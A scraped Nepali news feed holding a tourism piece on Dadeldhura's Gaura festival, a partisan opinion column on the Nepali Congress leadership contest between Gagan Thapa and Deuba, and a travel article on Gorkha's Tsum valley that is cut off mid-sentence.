बडा दशैंको महाअष्ठमीमा मेला लाग्ने गर्दछ ।
डडेलधुरामा सांस्कृतिक पर्वमा गौरा प्रमुख पर्व हो । गौरा पर्व सुदूरपश्चिमकै साझा पर्व भए पनि डडेलधुराको रौनक र आत्मीयता बेग्लै देखिन्छ । कतिपय पर्यटकहरू गौरा पर्वकै लागि डडेलधुरा पुग्ने गर्दछन । गौराका लागि परदेशिएकाहरू पनि घर फर्कन्छन, अनि गाउँ र बस्ती देउडाले गुञ्जिन्छ । गौरा पर्व भाद्र कृष्ण पञ्चमीमा घरमा भिजाइएको बिरुडा गहुँ, केराउ, गहत, मास र गुराँस सप्तमीमा मन्दिर लगेपछि पर्व सुरु हुन्छ । व्रतालुले शिव पार्वती स्वरुप गौरा महेश्वरको पूजा गर्दै व्रत बस्छन, मनोकामना पूरा हुने र घरमा सुख सौभाग्य आउने विश्वास गर्दछन । बिशेष गरी बजार वरपरका कारीगाउँ, सेलागाउँ, जीलोडा, हतर्क, मौराडा, जैसेरामा देउडा हेर्नकै लागि पर्यटक जम्मा हुन्छन । पूजापछि बाजागाजासहित देउडा, चैत, हुडकेउली, धमारी चल्छ । एकातिर केटा, अर्कातिर केटी तालमा ताल, पाइलामा पाइला मिलाउँदै दोहोरीमा सवाल जवाफ चल्दा पर्यटकहरूलाई रात बितेको पत्तै हुँदैन । यही मौलिक लय नै सुदूरपश्चिमको पहिचान हो, पाहुनाका लागि नौलो र रमाइलो अनुभव ।
पर्यटनका लागि डडेलधुरा प्राकृतिक, सांस्कृतिक, धार्मिक र ऐतिहासिक रुपमा समृद्ध छ । पर्यटकहरूले आफ्नो यात्राको समय बढाउन सके अमरगढी किल्ला, अजयमेरुकोट, उग्रतारा मात्र होइन डडेलधुरामा घटालबाबा, समैजी, आलिताल, परशुराम धाम, गन्यापधुरा, भागेश्वर, डागेश्वरी, नवदुर्गा, सहस्रलिंगलगायतका सम्पदाहरूमा पनि पर्यटकहरू पुग्न सक्दछन । पछिल्लो समय डडेलधुरा पर्यटनको लागि पूर्वाधारको बिकास हुँदै गएको छ । स्थानीयले डडेलधुरालाई भारतको नैनीतालसँग तुलना गर्छन । किनभने डडेलधुरा गर्मी छल्न मिल्ने हावापानी र प्राकृतिक सौन्दर्यले भरिएको छ ।
कसरी पुग्ने डडेलधुरा ?
डडेलधुरा जान कैलालीको अत्तरिया अथवा महेन्द्रनगरदेखि दैजी–जोगबुढा सडक हुँदै बुडर भएर पनि डडेलधुरा सदरमुकाम पुग्न सकिन्छ । दैजी हुँदै जोगबुढामा जादा महाकाली किनारामा रहेको परशुराम धामसँगै महाभारत पर्वतमाथि रहेको प्रसिद्ध आलीतालको आनन्दलिंदै डडेलधुरासम्म पुग्न सकिन्छ । अर्कोतर्फ मध्यपहाडी लोकमार्ग भएर सुर्खेत, अछाम र डोटी भएर पनि डडेलधुरा पुग्न सकिन्छ । तर पनि पुरानो सडक भनेको अत्तरिया–डडेलधुरा नै हो । अत्तरिया चोकवाट डडलेधुरा बजारको दुरी ११५ कि.मि.पर्दछ । डडेलधुरा जाँदा गोदावरीको समेत पर्यटकहरूले अवलोकन गर्न सक्दछन । अत्तरिया चोकदेखि बसमा चार घण्टाको यात्रामा डडेलधुराको सदरमुकाममा पुग्न सकिन्छ ।
(लेखक : लमजुङ जन्म थलो भई दाङलाई कर्मथलोका रुपमा रोज्नु भई लामो समयदेखि पत्रकारितामा सक्रीय रहनु भएका उहाँ नेपालको पर्यटनका बारेमा विशेष दखल राख्दै कलम चलाउने गर्नु हुन्छ । – सं.)
]]>
https://www.antaranganews.com/?feed=rss2&p=49855 0
गगन, देउवाहरू र नेपाली काँग्रेस https://www.antaranganews.com/?p=49791 https://www.antaranganews.com/?p=49791#respond Thu, 02 Jul 2026 04:51:10 +0000 https://www.antaranganews.com/?p=49791 कुनै पार्टीसंंग आबद्ध नभएका टिकाराम यात्री नाम चेलका युटुवर समेत हुन् र इमान्दार ब्यक्तित्व देखिन्छन् । उनले कांग्रेसको बारेमा भनेकी देउवाहरूको नेतृत्वमा कांग्रेस रहेको भए र गगन थापाले नेतृत्व परिवर्तन गरेर नेतृत्व नलिएको भए कांग्रेस माटो वा हलो भन्दा मुनी हुने थियो भने । अर्थात कांग्रेसको हैसियत राप्रपा वा श्रम संस्कृति पार्टीको भन्दा मुनी हुने थियो भन्ने उनको प्रष्ट धारणा थियो । यो भनाइलाई सत्य मान्दा देउवा, पुर्णबहादुर आदिलाई बधाई दिनै पर्छ । किनकि गगन, विश्वप्रकास आदिले गर्दा उनीहरूको कारण कांग्रेस रसातालमा पुगेन र जति कमजोर भयो त्यसको दोष पनि गगनहरूलाई नै दिन पाइयो । यसरी उनीहरूको दुबै हातमा लड्डु भए । टिकाराम यात्रीले भने जस्तै कांग्रेस छैटौं स्थानसम्ममा पुग्न सक्ने संभावना त देउवा नै नेतृत्वमा भएको भए पनि हुने थिएन । सायद यो पार्टी माओवादी भन्दा मात्र तल हुने थियो । देउवाहरू कांग्रेसको नेतृत्वमा भएको भए कांग्रेसका असन्तुष्टहरू देउवाको कारणले पनि अरु दललाई मत दिन सक्ने संभावना रहेकोमा माओवादीलाई पनि कांग्रेसको मत राम्रो जान सक्ने थियो । किनकी देउवाहरूले रुख छापमा मत दिनेहरूलाई माओवादीको छापमा पनि मत दिने बनाइ दिएका थिए । गगनहरूले कांग्रेसलाई करिव पतन हुनवाट बचाए र देउवाहरूलाई काल्पनिक घमण्ड गर्ने स्थान पनि दिए, अर्थात जनताले मत कम दिउर पार्टी लडे पनि खुट्टा आफ्नो खुट्टा माथि भन्ने अवस्थामा स्थापित गरिदिए । केही समय पाएको भएर देउवाहरूले मत मागेको भए कांग्रेसको केही मत र सिट थपिने नै थियो ।
देउवाहरू यो देश र कांग्रेसको लागि अभिसाप नै भएकोमा कुनै विवाद छैन जस्तो लाग्छ । देउवाहरूले आफ्ना कार्यकर्ताहरू र नेताहरू सबैभन्दा ज्यादा मार्ने भुतपुर्व माओवादी र बर्तमान प्रचण्डहरूसंग चुनाव मिलेर लडे । उनको यो सहकार्यले राजनीतिमा कोही पनि स्थायी शत्रु र मित्र हुंदैन भन्ने सन्देशलाई नराम्रो तरिकाले स्थापित गरिदियो । आफ्ना कार्यकर्ता, नेता र सुभचिन्तक मात्र होइन, लोकतन्त्रको पक्षमा रहनेहरूलाई मार्ने र सम्पत्ति तहसनहस पार्ने, घरमा बस्न नसक्ने बनाउने र गाउंँ खाली गरेर शहर हुंदै खाडी तथा मलेसियामा गएर गुजारा गर्न पर्ने अवस्था बनाउने प्रचण्ड एण्ड कम्पनी नै हुन् । उनैका ती कामहरू ठीक थिए भन्ने सन्देश दिएर मतियार बन्ने देउवाहरूको एकमात्र लक्ष्य जसरी र जति बेइमानी र बदनामी गरेर भए पनि पद भने चाहियो भन्ने रोगका माहारोगी देउवाहरू नै हुन् । इमान्दार शिक्षक, विकास र शिक्षामा समर्पित धर्म गुरु, गरिब मजदुर आदिलाई मार्नेहरू पनि पदको लागि देउवाहरूका भए । त्यो पिडाको अन्त्य र कांग्रेसमा नयां आशा र उत्साह जरुरी थियो । गगनहरूको नेतृत्वले कांग्रेसमा आशा जगायो केवल बिशेष परिस्थितीले उत्साह भने चाहे जस्तो हुन सकेन ।
गगनहरूको कारणले नै बालेन, रबिले सवैलाई बडार्दा र उनीहरू बाहेक अरु सवै रास्वपाका प्रत्यक्ष उमेदवार पनि समानुपातिक जस्तो देखिएर मेचीदेखि महाकालीसम्मका मतदाताहरूले बालेन र रवीलाई मत दिएको महसुस गर्दासमेत कांग्रेस देशको दोश्रो जन चाहानाको दल बन्यो । देउवाहरूले यसभन्दा पहिला माओवादीसंग मिलेर चुनाव लड्दा पपुलर मतमा एमाले सबै भन्दा अगाडि थियो । त्यो समयमा रास्वपा स्थापित भई सकेको थिएन र बालेनको जादु पनि छाएको थिएन । जबकि त्यस समयमा पनि कांग्रेस दोस्रो नै भएको थियो । अहिले पनि कांग्रेस दोस्रो नै बन्यो । रास्वपाले क्लिन स्विप गर्दा अन्य कुनै पनि दलले पहिलाको स्थान सुरक्षित गर्न सकेनन् । झनै २६ दल मिलेर बनेको नेपाली कम्युनिष्ट पार्टीको अवस्था हेर्दा त यो दलको मत पहिलाको माओवादीको भन्दा पनि धेरै कम आयो । यो परिपेक्षमा कांग्रेसले आफ्नो हैसियत रास्वपा बाहेक अरु दलको भन्दा राम्रो राख्न सक्यो । यसको श्रेय गगन, विश्व आदिहरूलाई नै जान्छ ।
देउवाको हैसियत त जिरो भन्दा पनि तल झरेको त उनको चुनाव क्षेत्रमा पहिला पनि उनका र अहिले पनि उनका साह्रै ज्यादा भक्त र आज्ञाकारी अर्थात उनका मानसपुत्र अर्थात देउवाका चेला नैनसिंह महरले नराम्रोसंग चुनाव हारेकोबाट देखिएको छ । यसवाट देउवा नै चुनाव लडेको भए पनि जित्ने थिएनन् भन्ने प्रष्ट भएको छ । किनकी देउवासंग असन्तुष्टहरूले देउवालाई मत नदिए पनि महरलाई मत दिन सक्थे र उनलाई चाहानेले त दिनु स्वभाविक हुन्छ । यसरी देउवाको साख र उनलार्य चाहानेहरू डंडेलधुरामा धेरै कम भएको कतैबाट छिपेको छैन । यस पटकको चुनामा हार भए पनि रास्वपाको लहरमा पनि गगनले उठेको चुनाव क्षेत्रमा कांग्रेसले पहिला ल्याएको मत भन्दा र कांग्रेसको समानुपातिक मत भन्दा प्रत्यक्षमा ज्यादा मत ल्याए । यसले गगत जनप्रिय हुन् र प्राविधिक रुपमा मात्र हारेका हुन् भन्न सकिन्छ ।
यथार्थमा नै देउवाका भक्त रहेका नेता र कार्यकर्ताहरूले कतै पनि कांग्रेसलाई सहयोग गरेको देखिंदैन । सिटौला, उमाकान्त चौधरी, सेखर, प्रकाशमान आदि समेत कसैले पनि कांग्रेसलाई सहयोग गरेका थिएनन् भन्ने देखिएको छ । उनीहरूले कमसेकम हामीहरूले कांग्रेसलाई अर्थात आफ्ना नेता र कार्यकर्ताहरूका हत्याराहरूसंग सहकार्य गर्यो, अब त्यसबाट बाहिर निस्कने अवसर भयो भन्ने मात्र सोचेको भए पनि ३÷४ प्रतिसतसम्म कांग्रेसको मत बढ्न सक्ने थियो । प्रत्यक्ष र समानुपातिकमा गरेर ७– ८ सिटसम्म कांग्रेसको बढ्न सक्ने थियो । क्लिन स्विप हुनलाई देउवाहरूले रिस पोख्न, आफ्ना गलत कार्य सस्थागत गर्न पाउंदा अप्रत्यक्ष रुपमासमेत सहयोग गरेका हुन् । यो रास्वपाको लागि राम्रो हो र अव यो मौकाको सदुपयोग गर्न सक्नु पर्छ । गगनले गर्दा कांग्रेस रसातालमा पुगेन र दोश्रो ठूलो दल बन्यो । रास्वपाले राम्रो गर्न नसकेमा कांग्रेस सुधारिएको देखिएकोले जनतामा निरासा नछाउने भयो । यसलाई गगनहरूले जोगाउन सक्नु पर्छ ।
धान खाने मुसा र दोस पाउने भ्याकुता भने जस्तो कांग्रेसमा पनि पदको लागि सिद्धान्तहिन र आफ्ना कार्यकर्ता र नेताहरूलाई मार्ने र दुख दिने देशलाई नै तहसननहस पार्नेहरुसंग कांध मिलाएर ज्यानमाराहरूको प्रसंसा गर्ने देउवाहरूले जस लिन खोजिरहेका छन् । यो दुष्टताको पराकाष्टा हो । कांग्रेसमा बेइमानहरू र इमान्दारहरू बिच द्वन्द्व देखिएकोेले मतदाताहरूले यस पटकको लागि रास्वपालाई मत दिने मन बनाउन सहयोग भयो । देउवाहरूले गरेको भ्रष्टाचारको हल्ला र धेरै गलत कार्यहरू, तथा गलत दिशमा राजनीतिलाई लग्ने र देश र जनतामा निरासा देखिएकोमा कांग्रेसको नाममा देउवाहरूले गरेको गल्तीको सजाय गगनहरूले पाए । कांग्रेसलाई देउवाहरूले यो दल आफूहरूको मात्र बिर्ता होइन भन्ने सोचेर हामीले पदमा रहेर काम गर्यौ, राम्रो गर्न सकिएन, बदनाम भइयो । पद सधैंको लागि होइन, लोकतन्त्रमा त झनै होइन भन्ने सोचेर गगनहरूको आगमनलाई स्वभाबिक मानेको भए कांग्रेसले १० सिट सम्म पनि थप्न सक्ने थियो ।
कांग्रेस गगनहरूको पक्षमा छ, कार्यकर्ताहरू गगनहरूको पक्षमा छन् । भुले भड्केकाहरू फिर्ता भइ रहेका छन् भन्ने त अहिलेको क्रियाशील सदस्यताको नविकरणले पनि देखाएको छ । पहिला जस्ले भरे पनि हुने अवस्थामा करिव ८ लाख क्रियाशील सदस्यहरू रहेकोमा झण्डै ७ लाख सदस्यहरु यस पटक पनि पुग्ने देखिन्छ । देउवाहरूका आसेपासे र उनका मतियारहरूको संख्या करिव ५० हजार त होला नै । अहिले शिक्षक तथा अन्य पेशमा लागेकाहरूले पार्टीको सदस्यता नलिने भन्ने बिषय प्रष्ट र दृढताको साथमा आएकोले करिव ७० हजार भन्दा ज्यादा पुराना सदस्यहरू ती क्षेत्रका रहेकोले उनीहरूले क्रियाशील सदस्यता नविकरण नगरेको देखिन्छ । यसरी हेर्दा रास्वपाको लहर, कांग्रेसमा भ्रम दिन देउवाहरू तथा देउवाका नयांँ सहयोगी सेखर कोइरालाहरू अझै ज्यादा खरानी घसेर लागेको अवस्थामा पनि कांग्रेसको क्रियाशील सदस्यतामा सारमा भिन्नता नआउनु कांग्रेस मुलभुत रुपमा एक छ भन्ने देखिएको छ । जनताले नरुचाएका, भ्रष्ट र कांग्रेसको अहित गर्नेसंग पदको लागि जोडिएकाहरू मात्र बाहिरिएका हुन् भन्ने क्रियाशील सदस्यता नबिकरणले प्रष्ट सन्देश प्राप्त भएको छ । पहिला भन्दा केही प्रक्रिया फरक भएकोले पनि केही सदस्यता कम हुन पुगेको पनि देखिनु स्वभाविक हो ।
अबको कांग्रेस भनेको सरकारको राम्रो काममा सहयोग गर्ने, अझ राम्रोको लागि सल्लाह दिने र गलत भएमा प्रष्ट रुपमा जनताको साथमा गलतलाई गलत भन्ने र उचित लोकतान्त्रिक विकल्पको रुपमा खडा हुने दल नै हुन पर्छ । अहिलेसम्म देशका कुनै पनि दलले कर्मचारी, मजदुर, ठेकेदार, पहुंचवालाको लागि नै नै मुख्य आधार मानेर सहयोग गरेका छन् । देशका बास्तविक आवश्यकता रहेका ८० प्रतिसत जनताको लागि उचित कार्य हुन सकेको छैन । तिनीहरूको पक्षमा कार्य गर्न आवश्यक छ । रास्वपाको बर्तमान सरकारले पनि ती जनताको लागि भन्दा केही पाएकालाई नै केही थप्ने कार्य गरेको छ । त्यो परम्परागत कार्य हो । यसको फाइदा कांग्रेसले लिन सक्छ । सोचलाई पुर्णत ओभरवाइलिगंग गर्न आवश्यक छ । त्यसको लागि रास्वपा, कांग्रेस, एमालेका युवा र इमान्दार पुस्ता समेत सजग भएर देशको हितको लागि एक ढिक्का हुन आवश्यक छ । सरकारको ज्यादा बिरोध गर्नै मन लागे पनि पाचौं बर्षमा गर्ने हो अहिले जनताको पक्षमा काम गर्न दवाव दिने हो भन्नेमा सचेत हुनै पर्छ ।
(लेखक : वरिष्ठ अधिवक्ता हुनुका साथै लमजुङको जेठो पत्रिका अन्तरङ्गको अतिथि सम्पादक हुनुहुन्छ । यो लेख सोही साप्ताहिक को आज प्रकाशित अंकबाट साभार गरिएको हो । – सं.)

]]>
https://www.antaranganews.com/?feed=rss2&p=49791 0
 गोरखा जिल्लाको चुम उपत्यका : पर्यटन अहिंसा क्षेत्र र बौद्ध संस्कृति   https://www.antaranganews.com/?p=49649 https://www.antaranganews.com/?p=49649#respond Thu, 25 Jun 2026 14:10:43 +0000 https://www.antaranganews.com/?p=49649 पर्यटनको उद्देश्य नयाँ ठाउँ, नयाँ अनुभव र नयाँ परिवेशको खोजी गर्नु हो । मानिस स्वभावतः आफूले नदेखेको र नभोगेको कुराप्रति आकर्षित हुन्छ । त्यसैले हिमाल नदेखेकालाई हिमाल हेर्ने रहर हुन्छ भने समुद्र नदेखेकालाई समुद्र अवलोकन गर्ने इच्छा हुन्छ । अर्कोतर्फ धेरै पर्यटकहरूलाई प्राकृतिक सौन्दर्यलाई प्रत्यक्ष अनुभव गर्ने जिज्ञासा हुन्छ । त्यसैले पर्यटकहरू पदयात्राका लागि विशेष गरी हिमाली क्षेत्र रोज्ने गर्दछन । विश्व पर्यटन बजारले नेपाललाई हिमाल र ट्रेकिङको देश भनेर चिनाएकाले वाह्य पर्यटकहरू हिमाली क्षेत्रमा पदयात्रा गर्न खोज्दछन ।
गोरखा जिल्लाको मनास्लु क्षेत्रमा नुब्री र चुम उपत्यका पर्दछ । पर्यटकहरूले पदयात्रा गर्ने दुबै उपत्यका तिब्बती बौद्ध संस्कृति, प्राचीन गुम्बा, हिमाली सभ्यता र प्राकृतिक सौन्दर्यका लागि प्रसिद्ध छन । नुब्री उपत्यका मनास्लु हिमालको उत्तरतर्फ पर्दछ । जहाँ सामागाउँ, साम्दो जस्ता गाउँहरू रहेका छन । चुम उपत्यकालाई लुकेको उपत्यका पनि भनिन्छ । गणेश हिमाल र श्रीङ्गी हिमालको बीचमा बग्ने स्यार खोलाले बनाएको छेकम्पार र चुमचेतलाई चुम उपत्यका भन्ने गरिन्छ । चुमचेतलाई तल्लो चुम र छेकम्पारलाई माथिल्लो चुम भनेर पनि चिनिन्छ । चुम उपत्यका प्राचीन ऐतिहासिक पवित्र बौद्ध धर्मको आस्था र उपासना स्थलको रुपमा रहिआएको छ । पर्यटनका लागि हिमाली जीवनशैलीका हिसाबले मनास्लु क्षेत्र अर्गानिक भूगोल हो । चुममा आजभोलि जैविक विविधता र संस्कृति संरक्षण गर्दै पर्या–पर्यटनको विकास भएको छ । एक्यापमा चुम र नुब्री दुवै उपत्यका पर्दछन । हिमाली श्रृंखला, प्राचीन गुम्बा, चैत्य र तिब्बती संस्कृति चुम र नुब्री पर्यटनका लागि दुवै उपत्यका आकर्षण मानिन्छ ।
मनास्लु सर्किट र चुम उपत्यका गरी दुई फरक–फरक पदयात्रा मार्ग यो क्षेत्रका प्रमुख आकर्षण हुन् । एडभेञ्चर र जोखिम मोल्न चाहने पर्यटकहरू मनास्लु सर्किटको यात्रा रोज्छन् भने हिमाली जीवनशैली, बौद्ध परम्परा र सुन्दर हिमाली दृश्यमा रमाउन चाहने पर्यटकहरू चुम उपत्यकाको यात्रा गर्न मन पराउँछन् । केही पदयात्रीले भने चुम उपत्यका र मनास्लु सर्किट दुवैको यात्रा एकैपटक गर्छन् । विशेष गरी मनास्लु क्षेत्रमा पदयात्रा गर्ने वाह्य पर्यटकहरू आरुघाटबाट चुम हुँदै नुब्री घुमेर लार्केपास गरी मनाङ निस्कन्छन । तर धेरै पर्यटकहरू चुम उपत्यका मात्र पुग्ने गर्दछन । कोहि पर्यटकहरू गएकै बाटो चुमबाट फर्कन्छन । वास्तवमा चुम उपत्यका पर्यटनका लागि सुन्दर उपहार हो । जहा बौद्ध दर्शन, प्रकृति, संस्कृति र जैविक विविधताले पर्यटकहरूलाई छुट्टै अनुभूति हुन्छ । चुम उपत्यकामा पाइला टेक्नेबित्तिकै धेरै पर्यटकहरू आश्चर्यचकित हुन्छन । प्राकृतिक सौन्दर्यका कारण मात्र होइन, यहाँका वन्यजन्तु र मानिसबीचको अदभुत सम्बन्धका कारण पनि पर्यटकहरूलाई अनौठो लाग्दछ । सामान्यतया जंगलका जनावरहरू मानिस देख्नेबित्तिकै भाग्छन, तर चुम उपत्यकामा दृश्य फरक छ ।
चुम उपत्यकालाई जीवजन्तुको खुला संग्रहालय भनिन्छ । यहाँका जीव जनावर र चराचुरुंगीको मानिससँग पारिवारिक सम्बन्ध जस्तै छ । चुम क्षेत्रमा झारल, घोरल, कस्तुरी मृग, कालिज, डाँफे तथा मुनाल, लंगुर बाँदर जस्ता जिवजन्तु प्रचुर मात्रामा पाइन्छ । खुला चिडियाखानको रुपमा समेत चिनिएको चुम क्षेत्रमा झारल नाउर कस्तुरी घर वरपर चरिरहेका हुन्छन । मानिससँगै जंगली जनावर पनि खेलिरहेका हुन्छन । चुम क्षेत्रका स्थानीयले दुध, दही, ध्यू, छुर्पीको लागि मात्रै पशुपालन गर्छन । आफूले पालेको पशु अन्य कसैलाई मारकाटको लागि विक्री गर्दैनन । चुम उपत्यकाका प्रमुख गाउँहरूमा तल्लो चुम, लोक्पा, चुम्लिङ, रिछेत, डोम्जे र माथिल्लो चुम, छोखाङ पारो अर्थात छेकम्पार, लार, लामागाउँ, बुर्जी, छुले, निले, राछेन गुम्बा, मु गुम्बा यी गाउँहरूमा तिब्बती बौद्ध संस्कृति, मणिपर्खाल, छोर्तेन र प्राचीन गुम्बाहरू धेरै छन । यी गाउँहरूमा पर्यटकहरू पुक्दा छक्क पर्दछन । करिब ८ सय घरधुरी रहेको चुम उपत्यकामा कुनै पनि जीव जनावर काटमार गर्न पाइदैन । शिकार खेल्न मह काड्ने र वनमा डढेलो लगाउन पाइदैन । चुम घुम्न जाने पर्यटकहरूले पनि मासु खान पाउँदैनन । किनभने होटलहरू सबै शाकाहारी मात्रै हुन्छन ।
चुम उपत्यकाको पदमार्ग वरिपरि नाउर, मृग, घोरल, हिमाली चराचुरुङ्गी तथा अन्य वन्यजन्तुहरुरू सहज रुपमा देखिन्छन । जनावरहरू पर्यटकहरूबाट त्रसित हुँदैनन, बरु आफ्नै संसारमा रमाइरहेका हुन्छन । यस्तो दृश्य देख्दा पर्यटकहरू क्यामेरा निकालेर फोटो खिच्न थाल्छन, भिडियो बनाउँछन र यो दुर्लभ अनुभवलाई स्मृतिमा कैद गर्न खोज्छन । यसको मूल कारण चुम उपत्यकाको प्राचीन अहिंसात्मक जीवनदर्शन हो । बौद्ध धर्म र करुणाको गहिरो प्रभाव रहेको चुम क्षेत्रमा जीवहत्या निषेध मानिन्छ । यहाँका स्थानीय समुदायले शताब्दीयौँदेखि सबै प्राणीलाई जीवनको समान अधिकार भएको ठान्दै आएका छन । यही कारण चुम उपत्यकालाई अहिंसा क्षेत्र भनेर चिनिन्छ । चुम उपत्यकामा जनावर र मानिसबीचको सम्बन्ध केवल सहअस्तित्वको मात्र होइन, विश्वासको पनि प्रतीक बनेको छ । यहाँको वातावरणले प्रकृति र मानवबीचको सामञ्जस्य कस्तो हुन सक्छ भन्ने जीवन्त उदाहरण प्रस्तुत गर्छ । नाउरको झुण्ड पदमार्ग नजिकै चरिरहेको देख्दा वा मृगहरू निर्धक्क हिंडिरहेको दृश्य अवलोकन गर्दा लाग्छ, मानौँ उनीहरु पनि आगन्तुकहरूको स्वागत गरिरहेका छन ।
 आजको संसारमा वन्यजन्तु र मानवबीचको द्वन्द्व बढदै गइरहेका बेला चुम उपत्यकाले करुणा, संरक्षण र सहअस्तित्वको सन्देश दिन्छ । चुम पुग्ने पर्यटकहरूले केवल हिमाल, गुम्बा र संस्कृति मात्र देख्दैनन, उनीहरूले एउटा यस्तो समाजको अनुभव गर्छन, जहाँ अहिंसाको भावना मानव सीमाभन्दा बाहिर फैलिएको छ र सम्पूर्ण जीवजगतलाई अँगालेको छ । त्यसैले चुम उपत्यका पर्यटनका लागि प्राकृतिक सौन्दर्यको अवलोकन मात्र होइन, प्रकृतिसँगको आत्मीय सम्बन्ध र अहिंसाको जीवित दर्शनसँगको साक्षात्कार पनि हुन्छ । चुम अहिंसा क्षेत्र घोषणा भएको १ सय ६ वर्ष भएको छ । पर्यटकहरूले चुम उपत्यकामा बौद्ध धर्म फैलाउने तान्त्रिक गुरु पदमसंभवले ध्यान, योग र साधना गरेको पवित्र भूमिका बारेमा सोधखोज गर्दछन । चुम उपत्यकामा पर्यटकलाई शान्त, स्वच्छ र प्रदूषणरहित वातावरणको अनुभव छुट्टै हुन्छ । अर्कोतर्फ स्थानीय संस्कृति, परम्परा, भाषा र जीवनशैलीसँग परिचित हुने मौका पनि हुन्छ । चुमको यात्रामा साहसिक अनुभव प्राप्त गर्दै शारीरिक तथा मानसिक तन्दुरुस्ती बढाउने पनि हुन्छ । हिमश्रृखला, सूर्योदय–सूर्यास्त तथा दुर्लभ वनस्पति र वन्यजन्तु अवलोकन गर्ने अवसर पनि हुन्छ । यसैले प्राकृतिक सौन्दर्य, साहसिकता, सांस्कृतिक विविधता र आत्मिक शान्तिको खोजीले पर्यटकहरूलाई हिमाली क्षेत्रमा पदयात्रातर्फ आकर्षित गर्दछ ।
चुम उपत्यका विशिष्ट सांस्कृतिक तथा धार्मिक पर्यटन र बौद्ध संस्कृतिको जीवित संग्रहालय हो । चुम उपत्यकाका बासिन्दाले आज पनि शताब्दीयौँ पुराना भाषा, भेषभूषा, संस्कृति, धार्मिक परम्परा र अहिंसाको जीवनशैलीलाई संरक्षण गरेका छन । चुम उपत्यकामा रहेका प्राचीन गुम्बा, मणी पर्खाल, छोर्तेन, प्रार्थना झण्डा तथा ध्यानस्थलहरूले यस क्षेत्रलाई आध्यात्मिक पर्यटनको महत्वपूर्ण केन्द्र बनाएको छ । विशेष गरी मु गुम्बा र राछेन गुम्बा बौद्ध धर्मावलम्बीहरूका लागि पवित्र तीर्थस्थल मानिन्छन । स्थानीय समुदायको जीवनशैली, धार्मिक आस्था र सांस्कृतिक सम्पदा आजसम्म जीवित रहेकाले चुम उपत्यका पुगेका पर्यटकहरूले वास्तविक हिमाली बौद्ध सभ्यताको अनुभव गर्न सक्छन । गणेश हिमाल, श्रीङ्गी हिमाल र बौद्ध हिमालको मनोरम दृश्यले सजिएको चुम उपत्यका पर्यटनका लागि प्राकृतिक सौन्दर्य, आध्यात्मिक शान्ति र सांस्कृतिक सम्पदाको अनुपम संगम हो । चुम क्षेत्रमा रहेको मु गुम्बा, राचेन आनी गुम्बा, मिलारेपा गुफा, छेसोङ ताल लगायत अन्य गुम्बाहरूले चुम उपत्यका पर्यटनका लागि अविस्मरणीय यात्राको महसुस हुन्छ । पदयात्राको क्रममा बौद्ध, संस्कृति, कला, रहनसहन, दैनिकी जिबन यापन र स्थानिय खानपिनको अनुभवको मज्जा छुट्टै हुन्छ । पर्यटकलाई गाउँघरमै उब्जाइएका जैविक आलु फापर, मकै, कोदो, भटमास, रायोको साग, चौरीको दुध, दही, छुर्पी लगायत परिकार खुवाउने गर्छन ।
चुम उपत्यकाको सामाजिक र सांस्कृतिक सम्बन्ध शताब्दीयौँदेखि तिब्बतसँग जोडिएको छ  । चुममा पुग्ने पर्यटकहरुले बहुपति प्रथा सुन्दा अचम्म मान्दछन । वहुपति प्रथामा एक महिलाले एउटै परिवारका दुई वा बढी दाजुभाइसँग विवाह गर्ने चलन हुन्छ । हिमाली क्षेत्रमा सीमित खेतीयोग्य जमिन, कठोर जीवनयापन र पारिवारिक सम्पत्ति टुक्रिन नदिन यस्तो प्रथा विकसित भएको मानिन्छ । चुम उपत्यकामा यो प्रथा अहिले नयाँ पुस्तामा प्रायः देखिँदैन । तर पनि चुम उपत्यकाको संस्कृति अध्ययन गर्ने पर्यटकहरूका लागि वहुपति प्रथा चासो र अनुसन्धानको विषय बन्दछ । चुममा महायान बौद्ध धर्मको प्रभाव भए पनि यो प्रथा धार्मिक आदेश भने होइन । बौद्ध धर्मले यसलाई न अनिवार्य गरेको छ, न निषेध । यो मुख्यतः हिमाली भूगोल, सीमित जमिन र सानो उत्पादनमा स्रोत जोगाउने सामाजिक रणनीति प्रथा मानिन्छ ।
मनास्लु पदमार्गमा स्यार खोला र बुढीगण्डकी मिसिने ठाउँलाई न्याक अर्थात न्याक पेडी पनि भनिन्छ । यही दोभानबाट स्यार खोला उपत्यका हुँदै चुम उपत्यकाको पदयात्रा सुरु हुन्छ । बुढीगण्डकी मनास्लुको उत्तरतर्फका हिमनदीबाट निस्केर गहिरा गल्छी चिर्दै दक्षिण बग्छ भने स्यार खोला गणेश हिमाल र हिमचुलीबाट उदगम भएर निले, छुले, छेकम्पार, चुम्लिङ हुँदै न्याकमा आएर बुढीगण्डकीमा मिसिन्छ । न्याकबाट चुम जाने स्वागत गेटबाट अगाडी लाग्ना साथ घना जंगल, झोलुंगे पुल पार गर्दै शेर्पा गाउँ चुम्लिङ पुगिन्छ । छेकम्पार चुमको सबैभन्दा ठूलो गाउँ हो । जहाँ पर्यटकहरुका लागि होटल, लजहरु छन । छेकम्पार देखि पर्यटकहरूलाई ढुंगाले बनेका घर, गुम्बा, माने र छोर्तेनले  वास्तविक चुमको अनुभव दिन्छ । यही बाटो हुँदै तिब्बतको ताप्ले नाका पनि पुग्न सकिन्छ । त्यसैले छेकम्पारमा सीमा प्रहरी चौकी पनि छ ।
मनास्लुको पछाडि सामागाउँ, साम्दो लगायत एक दर्जन गाउँ छन् । पूर्वतर्फ रहेको बौद्ध हिमालको पछाडि भने चुम उपत्यका पर्दछ । नेपालको नक्सा हेर्दा गोरखा जिल्लाको उत्तरी भागमा तिब्बततिर धकेलिएको भाग देख्नुहुनेछ । त्यहीँ पर्छ चुम उपत्यका । छेकम्पार, निले, चुले लगायत एक दर्जन गाउँ रहेको चुम रहस्यले भरिएको हिमाली उपत्यका हो । कल्पना गर्नुस त यी हिमाली गाउँ घुम्नुको मज्जा, यहाँका गुम्बा, स्तुप, र्छोर्तेन, माने वरिपरि घुम्न पाउदा पर्यटकहरु को अनुभव शब्दमा बर्णन गर्न सकिन्न । जीवनमा थोरै मानिसले मात्र यो आनन्द महसुस गर्न पाउँछन् । प्रकृति र बौद्ध परम्पराले अदभूत सजिएको चुममा केही वर्ष यता विदेशी पर्यटकहरू पुग्न थालेका छन । पदयात्रामा रमाउन खोज्ने पर्यटकहरुलाई मनास्लुको वास्तविक हिमाली, तिब्बती संस्कृति को अनुभव माथिल्लो क्षेत्रमा हुन्छ । तर मनास्लु पदमार्ग अब पूर्ण रुपमा पदमार्ग मात्र रहेन । सडक र पदयात्रा सहअस्तित्वमा रहेको मिश्रित मार्ग बनेको छ । तर नामरुङ माथिको 